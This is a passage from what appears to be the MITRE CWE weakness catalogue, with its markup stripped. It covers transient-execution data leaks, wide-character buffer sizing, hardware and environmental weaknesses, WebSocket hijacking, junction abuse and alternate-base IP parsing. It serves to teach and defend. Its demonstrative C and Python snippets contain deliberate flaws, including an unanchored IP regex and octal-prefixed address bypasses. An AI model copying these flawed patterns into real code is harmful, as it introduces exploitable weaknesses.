by an attacker) to the stack, which is trusted memory. Additionally, this store operation will save this value in some microarchitectural buffer, e.g. the store queue. + In this code gadget, + trusted_ptr is dereferenced while the attacker forces a page fault. The faulting load causes the processor to mis-speculate by forwarding untrusted_arg as the (speculative) load result. The processor then uses untrusted_arg for the pointer dereference. After the fault has been handled and the load has been re-issued with the correct argument, secret-dependent information stored at the address of trusted_ptr remains in microarchitectural state and can be extracted by an attacker using a code gadget. + + + + + CVE-2020-0551 + Load value injection in some processors utilizing speculative execution may allow an authenticated user to enable information disclosure via a side-channel with local access. + https://www.cve.org/CVERecord?id=CVE-2020-0551 + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE-1342 differs from CWE-1303, which is related to misprediction and biasing microarchitectural components, while CWE-1342 addresses illegal data flows and retention. For example, Spectre is an instance of CWE-1303 biasing branch prediction to steer the transient execution indirectly. + + As of CWE 4.9, members of the CWE Hardware SIG are closely analyzing this entry and others to improve CWE's coverage of transient execution weaknesses, which include issues related to Spectre, Meltdown, and other attacks. Additional investigation may include other weaknesses related to microarchitectural state. As a result, this entry might change significantly in CWE 4.10. + + + + + Anders Nordstrom, Alric Althoff + Tortuga Logic + 2021-09-22 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Maintenance_Notes, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not correctly calculate the length of strings that can contain wide or multi-byte characters. + + + + + + + + + + Implementation + + There are several ways in which improper string length checking may result in an exploitable condition. All of these, however, involve the introduction of buffer overflow conditions in order to reach an exploitable state. + The first of these issues takes place when the output of a wide or multi-byte character string, string-length function is used as a size for the allocation of memory. While this will result in an output of the number of characters in the string, note that the characters are most likely not a single byte, as they are with standard character strings. So, using the size returned as the size sent to new or malloc and copying the string to this newly allocated memory will result in a buffer overflow. + Another common way these strings are misused involves the mixing of standard string and wide or multi-byte string functions on a single string. Invariably, this mismatched information will result in the creation of a possibly exploitable buffer overflow condition. + + + + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + This weakness may lead to a buffer overflow. Buffer overflows often can be used to execute arbitrary code, which is usually outside the scope of a program's implicit security policy. This can often be used to subvert any other security service. + + + Availability + Confidentiality + Read Memory + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. Other attacks leading to lack of availability are possible, including putting the program into an infinite loop. + + + Confidentiality + Read Memory + In the case of an out-of-bounds read, the attacker may have access to sensitive information. If the sensitive information contains system details, such as the current buffers position in memory, this knowledge can be used to craft further attacks, possibly with more severe consequences. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + Always verify the length of the string unit character. + + + Implementation + Libraries or Frameworks + Use length computing functions (e.g. strlen, wcslen, etc.) appropriately with their equivalent type (e.g.: byte, wchar_t, etc.) + + + + + The following example would be exploitable if any of the commented incorrect malloc calls were used. + + #include <stdio.h>#include <strings.h>#include <wchar.h> + int main() { + + wchar_t wideString[] = L"The spazzy orange tiger jumped " \"over the tawny jaguar.";wchar_t *newString; + printf("Strlen() output: %d\nWcslen() output: %d\n",strlen(wideString), wcslen(wideString)); + /* Wrong because the number of chars in a string isn't related to its length in bytes //newString = (wchar_t *) malloc(strlen(wideString));*/ + /* Wrong because wide characters aren't 1 byte long! //newString = (wchar_t *) malloc(wcslen(wideString));*/ + /* Wrong because wcslen does not include the terminating null */newString = (wchar_t *) malloc(wcslen(wideString) * sizeof(wchar_t)); + /* correct! */newString = (wchar_t *) malloc((wcslen(wideString) + 1) * sizeof(wchar_t)); + /* ... */ + } + + The output from the printf() statement would be: + + Strlen() output: 0Wcslen() output: 53 + + + + + + Improper string length checking + + + FIO10-J + Ensure the array is filled when using read() to fill an array + + + SFP10 + Incorrect Buffer Length Computation + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Description + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Enabling_Factors_for_Exploitation, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Enabling_Factors_for_Exploitation, Modes_of_Introduction, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Gregory Padgett + Unitrends + 2010-01-11 + correction to Demonstrative_Example + + Improper String Length Checking + + + + A hardware device, or the firmware running on it, is + missing or has incorrect protection features to maintain + goals of security primitives when the device is cooled below + standard operating temperatures. + + The hardware designer may improperly anticipate + hardware behavior when exposed to exceptionally cold + conditions. As a result they may introduce a weakness by not + accounting for the modified behavior of critical components + when in extreme environments. + An example of a change in behavior is that power loss + won't clear/reset any volatile state when cooled below + standard operating temperatures. This may result in + a weakness when the starting state of the volatile memory is + being relied upon for a security decision. For example, a + Physical Unclonable Function (PUF) may be supplied as a + security primitive to improve confidentiality, + authenticity, and integrity guarantees. However, when the + PUF is paired with DRAM, SRAM, or another temperature + sensitive entropy source, the system designer may introduce + weakness by failing to account for the chosen entropy + source's behavior at exceptionally low temperatures. In the + case of DRAM and SRAM, when power is cycled at low + temperatures, the device will not contain the bitwise + biasing caused by inconsistencies in manufacturing and will + instead contain the data from previous boot. Should the PUF + primitive be used in a cryptographic construction which + does not account for full adversary control of PUF seed + data, weakness would arise. + This weakness does not cover "Cold Boot Attacks" + wherein RAM or other external storage is super cooled and + read externally by an attacker. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Authentication + Varies by Context + Unexpected State + Low + Consequences of this weakness are highly contextual. + + + + + Architecture and Design + The system should account for security primitive behavior when cooled outside standard temperatures. + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Paul A. Wortman + Wells Fargo + 2020-10-23 + 4.5 + 2021-07-20 + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product is built from multiple separate components, but it uses a component that is not sufficiently trusted to meet expectations for security, reliability, updateability, and maintainability. + + Many modern hardware and software products are built by combining multiple smaller components together into one larger entity, often during the design or architecture phase. For example, a hardware component might be built by a separate supplier, or the product might use an open-source software library from a third party. + Regardless of the source, each component should be sufficiently trusted to ensure correct, secure operation of the product. If a component is not trustworthy, it can produce significant risks for the overall product, such as vulnerabilities that cannot be patched fast enough (if at all); hidden functionality such as malware; inability to update or replace the component if needed for security purposes; hardware components built from parts that do not meet specifications in ways that can lead to weaknesses; etc. Note that a component might not be trustworthy even if it is owned by the product vendor, such as a software component whose source code is lost and was built by developers who left the company, or a component that was developed by a separate company that was acquired and brought into the product's own company. + Note that there can be disagreement as to whether a component is sufficiently trustworthy, since trust is ultimately subjective. Different stakeholders (e.g., customers, vendors, governments) have various threat models and ways to assess trust, and design/architecture choices might make tradeoffs between security, reliability, safety, privacy, cost, and other characteristics. + + + + + + + Indirect + + + + + + + + + + Requirements + Requirements might include criteria for which the only available solutions are provided by insufficiently trusted components. + + + Architecture and Design + An insufficiently trusted component might be selected because it is less expensive to do in-house, requires expertise that is not available in-house, or might allow the product to reach the market faster. + + + + + Other + Reduce Maintainability + + + + + Requirements + Architecture and Design + Implementation + For each component, ensure that its supply chain is well-controlled with sub-tier suppliers using best practices. For third-party software components such as libraries, ensure that they are developed and actively maintained by reputable vendors. + + + Architecture and Design + Implementation + Integration + Manufacturing + Maintain a Bill of Materials for all components and sub-components of the product. For software, maintain a Software Bill of Materials (SBOM). According to [REF-1247], "An SBOM is a formal, machine-readable inventory of software components and dependencies, information about those components, and their hierarchical relationships." + + + Operation + Patching and Maintenance + Continue to monitor changes in each of the product's components, especially when the changes indicate new vulnerabilities, end-of-life (EOL) plans, supplier practices that affect trustworthiness, etc. + + + + + CVE-2020-9054 + Chain: network-attached storage (NAS) device has a critical OS command injection (CWE-78) vulnerability that is actively exploited to place IoT devices into a botnet, but some products are "end-of-support" and cannot be patched (CWE-1277). [REF-1097] + https://www.cve.org/CVERecord?id=CVE-2020-9054 + + + + + Part 2-4 + Req SP.03.02 RE(1) + + + Part 2-4 + Req SP.03.02 RE(2) + + + Part 3-3 + Req SR 1.13 + + + Part 4-2 + Req EDR 3.12 + + + Part 4-2 + Req HDR 3.12 + + + Part 4-2 + Req NDR 3.12 + + + Part 4-2 + Req EDR 3.13 + + + Part 4-2 + Req HDR 3.13 + + + Part 4-2 + Req NDR 3.13 + + + Part 4-2 + Req CR-7.8 + + + Part 4-1 + Req SM-6 + + + Part 4-1 + Req SM-9 + + + Part 4-1 + Req SM-10 + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + As of CWE 4.10, the name and description for this entry has undergone significant change and is still under public discussion, especially by members of the HW SIG. + + + + CWE Content Team + MITRE + 2022-04-20 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Maintenance_Notes, Modes_of_Introduction, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Taxonomy_Mappings + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-06-29 + 4.12 + 2023-06-29 + Suggested mappings to ISA/IEC 62443. + + Reliance on Uncontrolled Component + + + + The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as control elements or syntactic markers when they are sent to a downstream component. + Most languages and protocols have their own special elements such as characters and reserved words. These special elements can carry control implications. If product does not prevent external control or influence over the inclusion of such special elements, the control flow of the program may be altered from what was intended. For example, both Unix and Windows interpret the symbol < ("less than") as meaning "read input from a file". + + + + + + Primary + + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Integrity + Availability + Other + Execute Unauthorized Code or Commands + Alter Execution Logic + DoS: Crash, Exit, or Restart + + + + + Implementation + Developers should anticipate that special elements (e.g. delimiters, symbols) will be injected into input vectors of their product. One defense is to create an allowlist (e.g. a regular expression) that defines valid input according to the requirements specifications. Strictly filter any input that does not match against the allowlist. Properly encode your output, and quote any elements that have special meaning to the component with which you are communicating. + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + Implementation + Use and specify an appropriate output encoding to ensure that the special elements are well-defined. A normal byte sequence in one encoding could be a special element in another. + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + Implementation + Output Encoding + While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88). + + + + + CVE-2001-0677 + Read arbitrary files from mail client by providing a special MIME header that is internally used to store pathnames for attachments. + https://www.cve.org/CVERecord?id=CVE-2001-0677 + + + CVE-2000-0703 + Setuid program does not cleanse special escape sequence before sending data to a mail program, causing the mail program to process those sequences. + https://www.cve.org/CVERecord?id=CVE-2000-0703 + + + CVE-2003-0020 + Multi-channel issue. Terminal escape sequences not filtered from log files. + https://www.cve.org/CVERecord?id=CVE-2003-0020 + + + CVE-2003-0083 + Multi-channel issue. Terminal escape sequences not filtered from log files. + https://www.cve.org/CVERecord?id=CVE-2003-0083 + + + + + Special Elements (Characters or Reserved Words) + + + Custom Special Character Injection + + + SFP24 + Tainted input to command + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This weakness can be related to interpretation conflicts or interaction errors in intermediaries (such as proxies or application firewalls) when the intermediary's model of an endpoint does not account for protocol-specific special elements. + See this entry's children for different types of special elements that have been observed at one point or another. However, it can be difficult to find suitable CVE examples. In an attempt to be complete, CWE includes some types that do not have any associated observed example. + This weakness is probably under-studied for proprietary or custom formats. It is likely that these issues are fairly common in applications that use their own custom format for configuration files, logs, meta-data, messaging, etc. They would only be found by accident or with a focused effort based on an understanding of the format. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Description, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name + + + CWE Content Team + MITRE + 2009-07-27 + updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-12-28 + updated Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Description, Name + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Special Elements (Characters or Reserved Words) + Failure to Sanitize Special Elements + Improper Sanitization of Special Elements + + + + The product does not properly handle unexpected physical or environmental conditions that occur naturally or are artificially induced. + + Hardware products are typically only guaranteed to behave correctly within certain physical limits or environmental conditions. Such products cannot necessarily control the physical or external conditions to which they are subjected. However, the inability to handle such conditions can undermine a product's security. For example, an unexpected physical or environmental condition may cause the flipping of a bit that is used for an authentication decision. This unexpected condition could occur naturally or be induced artificially by an adversary. + Physical or environmental conditions of concern are: + + + Atmospheric characteristics: extreme temperature ranges, etc. + + + Interference: electromagnetic interference (EMI), radio frequency interference (RFI), etc. + + + Assorted light sources: white light, ultra-violet light (UV), lasers, infrared (IR), etc. + + + Power variances: under-voltages, over-voltages, under-current, over-current, etc. + + + Clock variances: glitching, overclocking, clock stretching, etc. + + + Component aging and degradation + + + Materials manipulation: focused ion beams (FIB), etc. + + + Exposure to radiation: x-rays, cosmic radiation, etc. + + + + + + + + + + + + + Architecture and Design + The product's design might not consider checking and handling extreme conditions. + + + Manufacturing + For hardware manufacturing, sub-par components might be chosen that are not able to handle the expected environmental conditions. + + + + + Confidentiality + Integrity + Availability + Varies by Context + Unexpected State + Consequences of this weakness are highly dependent on the role of affected components within the larger product. + + + + + Requirements + In requirements, be specific about expectations for how the product will perform when it exceeds physical and environmental boundary conditions, e.g., by shutting down. + + + Architecture and Design + Implementation + Where possible, include independent components that can detect excess environmental conditions and have the capability to shut down the product. + + + Architecture and Design + Implementation + Where possible, use shielding or other materials that can increase the adversary's workload and reduce the likelihood of being able to successfully trigger a security-related failure. + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2022-04-21 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2022-06-28 + updated Description, Name, Potential_Mitigations, Relationships, Type + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Members of the Hardware CWE Special Interest Group + 2022-05-13 + Provided feedback on descriptions + + Improper Handling of Extreme Physical Environment Conditions + + + + The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid. + + WebSockets provide a bi-directional low latency communication (near real-time) between a client and a server. WebSockets are different than HTTP in that the connections are long-lived, as the channel will remain open until the client or the server is ready to send the message, whereas in HTTP, once the response occurs (which typically happens immediately), the transaction completes. + A WebSocket can leverage the existing HTTP protocol over ports 80 and 443, but it is not limited to HTTP. WebSockets can make cross-origin requests that are not restricted by browser-based protection mechanisms such as the Same Origin Policy (SOP) or Cross-Origin Resource Sharing (CORS). Without explicit origin validation, this makes CSRF attacks more powerful. + + + + + + + + + + + Cross-Site WebSocket hijacking (CSWSH) + this term is used for attacks that exploit this weakness + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Availability + Non-Repudiation + Access Control + Varies by Context + Gain Privileges or Assume Identity + Bypass Protection Mechanism + Read Application Data + Modify Application Data + DoS: Crash, Exit, or Restart + The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product's users. Because the attacker has the identity of the victim, the scope of the CSRF is limited only by the victim's privileges. + + + + + Implementation + Enable CORS-like access restrictions by verifying the 'Origin' header during the WebSocket handshake. + + + Implementation + Use a randomized CSRF token to verify requests. + + + Implementation + Use TLS to securely communicate using 'wss' (WebSocket Secure) instead of 'ws'. + + + Architecture and Design + Implementation + Require user authentication prior to the WebSocket connection being established. For example, the WS library in Node has a 'verifyClient' function. + + + Implementation + Leverage rate limiting to prevent against DoS. Use of the leaky bucket algorithm can help with this. + Defense in Depth + + + Implementation + Use a library that provides restriction of the payload size. For example, WS library for Node includes 'maxPayloadoption' that can be set. + Defense in Depth + + + Implementation + Treat data/input as untrusted in both directions and apply the same data/input sanitization as XSS, SQLi, etc. + + + + + CVE-2020-25095 + web console for SIEM product does not check Origin header, allowing Cross Site WebSocket Hijacking (CSWH) + https://www.cve.org/CVERecord?id=CVE-2020-25095 + + + CVE-2018-6651 + Chain: gaming client attempts to validate the Origin header, but only uses a substring, allowing Cross-Site WebSocket hijacking by forcing requests from an origin whose hostname is a substring of the valid origin. + https://www.cve.org/CVERecord?id=CVE-2018-6651 + + + CVE-2018-14730 + WebSocket server does not check the origin of requests, allowing attackers to steal developer's code using a ws://127.0.0.1:3123/ connection. + https://www.cve.org/CVERecord?id=CVE-2018-14730 + + + CVE-2018-14731 + WebSocket server does not check the origin of requests, allowing attackers to steal developer's code using a ws://127.0.0.1/ connection to a randomized port number. + https://www.cve.org/CVERecord?id=CVE-2018-14731 + + + CVE-2018-14732 + WebSocket server does not check the origin of requests, allowing attackers to steal developer's code using a ws://127.0.0.1:8080/ connection. + https://www.cve.org/CVERecord?id=CVE-2018-14732 + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous External Contributor + 2021-05-28 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product opens a file or directory, but it does not properly prevent the name from being associated with a junction or mount point to a destination that is outside of the intended control sphere. + + Depending on the intended action + being performed, this could allow an + attacker to cause the product to read, + write, delete, or otherwise operate on + unauthorized files. + In Windows, NTFS5 allows for file + system objects called reparse points. + Applications can create a hard link from one + directory to another directory, called a + junction point. They can also create a + mapping from a directory to a drive letter, + called a mount point. If a file is used by a + privileged program, but it can be replaced + with a hard link to a sensitive file (e.g., + AUTOEXEC.BAT), an attacker could excalate + privileges. When the process opens the file, + the attacker can assume the privileges of + that process, tricking the privileged + process to read, modify, or delete the + sensitive file, preventing the program from + accurately processing data. Note that one + can also point to registries and + semaphores. + + + + + + + + + + + Implementation + The developer might not consider that when a program in Windows operates with different permissions than the executing user, the use of links, mount points, and junctions might cause the program to access files or directories that are outside of the intended storage location. + + + + + Confidentiality + Read Files or Directories + Read arbitrary files by replacing a user-controlled folder with a mount point and additional hard links. + + + Integrity + Modify Files or Directories + Modify an arbitrary file by replacing the rollback files in installer directories, as they can have the installer execute those rollbacks. + + + Availability + Modify Files or Directories + Even if there is no control of contents, an arbitrary file delete or overwrite (when running as SYSTEM or admin) can be used for a permanent system denial-of-service, e.g. by deleting a startup configuration file that prevents the service from starting. + + + + + Architecture and Design + Separation of Privilege + When designing software that will have different rights than the executer, the software should check that files that it is interacting with are not improper hard links or mount points. One way to do this in Windows is to use the functionality embedded in the following command: "dir /al /s /b" or, in PowerShell, use LinkType as a filter. In addition, some software uses authentication via signing to ensure that the file is the correct one to use. Make checks atomic with the file action, otherwise a TOCTOU weakness (CWE-367) can be introduced. + + + + + CVE-2021-26426 + Privileged service allows attackers to delete unauthorized files using a directory junction, leading to arbitrary code execution as SYSTEM. + https://www.cve.org/CVERecord?id=CVE-2021-26426 + + + CVE-2020-0863 + By creating a mount point and hard links, an attacker can abuse a service to allow users arbitrary file read permissions. + https://www.cve.org/CVERecord?id=CVE-2020-0863 + + + CVE-2019-1161 + Chain: race condition (CWE-362) in anti-malware product allows deletion of files by creating a junction (CWE-1386) and using hard links during the time window in which a temporary file is created and deleted. + https://www.cve.org/CVERecord?id=CVE-2019-1161 + + + CVE-2014-0568 + Escape from sandbox for document reader by using a mountpoint [REF-1264] + https://www.cve.org/CVERecord?id=CVE-2014-0568 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Symbolic links, hard links, junctions, and mount points can be confusing terminology, as there are differences in how they operate between UNIX-based systems and Windows, and there are interactions between them. + This entry is still under development and will continue to see updates and content improvements. + + + + CWE Content Team + MITRE + 2022-06-07 + 4.8 + 2022-06-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product parses numeric input assuming base 10 (decimal) values, but it does not account for inputs that use a different base number (radix). + + Frequently, a numeric input that begins with "0" is treated as octal, or "0x" causes it to be treated as hexadecimal, e.g. by the inet_addr() function. For example, "023" (octal) is 35 decimal, or "0x31" is 49 decimal. Other bases may be used as well. If the developer assumes decimal-only inputs, the code could produce incorrect numbers when the inputs are parsed using a different base. This can result in unexpected and/or dangerous behavior. For example, a "0127.0.0.1" IP address is parsed as octal due to the leading "0", whose numeric value would be the same as 87.0.0.1 (decimal), where the developer likely expected to use 127.0.0.1. + The consequences vary depending on the surrounding code in which this weakness occurs, but they can include bypassing network-based access control using unexpected IP addresses or netmasks, or causing apparently-symbolic identifiers to be processed as if they are numbers. In web applications, this can enable bypassing of SSRF restrictions. + + + + + + + + + + + Implementation + Input validation used may assume decimal bases during conditional checks, when it may not always be the case. + + + Implementation + The application may rely on a service that supports different numerical bases. + + + + + Confidentiality + Read Application Data + Unknown + An attacker may use an unexpected numerical base to access private application resources. + + + Integrity + Bypass Protection Mechanism + Alter Execution Logic + Unknown + An attacker may use an unexpected numerical base to bypass or manipulate access control mechanisms. + + + + + Implementation + Enforcement by Conversion + If only decimal-based values are expected in the application, conditional checks should be created in a way that prevent octal or hexadecimal strings from being checked. This can be achieved by converting any numerical string to an explicit base-10 integer prior to the conditional check, to prevent octal or hex values from ever being checked against the condition. + + + Implementation + Input Validation + If various numerical bases do need to be supported, check for leading values indicating the non-decimal base you wish to support (such as 0x for hex) and convert the numeric strings to integers of the respective base. Reject any other alternative-base string that is not intentionally supported by the application. + + + Implementation + Input Validation + If regular expressions are used to validate IP addresses, ensure that they are bounded using ^ and $ to prevent base-prepended IP addresses from being matched. + + + + + The below demonstrative example uses an IP validator that splits up an IP address by octet, tests to ensure each octet can be casted into an integer, and then returns the original IP address if no exceptions are raised. This validated IP address is then tested using the "ping" command. + + + import subprocess + + def validate_ip(ip: str): + + split_ip = ip.split('.') + if len(split_ip) > 4 or len(split_ip) == 0: + + raise ValueError("Invalid IP length") + + + for octet in split_ip: + + try: + + int(octet, 10) + + except ValueError as e: + + raise ValueError(f"Cannot convert IP octet to int - {e}") + + + + # Returns original IP after ensuring no exceptions are raised + return ip + + + + def run_ping(ip: str): + + validated = validate_ip(ip) + # The ping command treats zero-prepended IP addresses as octal + result = subprocess.call(["ping", validated]) + print(result) + + + + If run_ping() were to be called with one or more zero-prepended octets, validate_ip() will succeed as zero-prepended numerical strings can be interpreted as decimal by a cast ("012" would cast to 12). However, as the original IP with the prepended zeroes is returned rather than the casted IP, it will be used in the call to the ping command. Ping DOES check and support octal-based IP octets, so the IP reached via ping may be different than the IP assumed by the validator. For example, ping would considered "0127.0.0.1" the same as "87.0.0.1". + + + This code uses a regular expression to validate an IP string prior to using it in a call to the "ping" command. + + + import subprocess + import re + + def validate_ip_regex(ip: str): + + ip_validator = re.compile(r"((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}") + if ip_validator.match(ip): + + return ip + + else: + + raise ValueError("IP address does not match valid pattern.") + + + + def run_ping_regex(ip: str): + + validated = validate_ip_regex(ip) + # The ping command treats zero-prepended IP addresses as octal + result = subprocess.call(["ping", validated]) + print(result) + + + + Since the regular expression does not have anchors (CWE-777), i.e. is unbounded without ^ or $ characters, then prepending a 0 or 0x to the beginning of the IP address will still result in a matched regex pattern. Since the ping command supports octal and hex prepended IP addresses, it will use the unexpectedly valid IP address (CWE-1389). For example, "0x63.63.63.63" would be considered equivalent to "99.63.63.63". As a result, the attacker could potentially ping systems that the attacker cannot reach directly. + + + Consider the following scenario, inspired by CWE team member Kelly Todd. + Kelly wants to set up monitoring systems for his two cats, who pose very different threats. One cat, Night, tweets embarrassing or critical comments about his owner in ways that could cause reputational damage, so Night's blog needs to be monitored regularly. The other cat, Taki, likes to 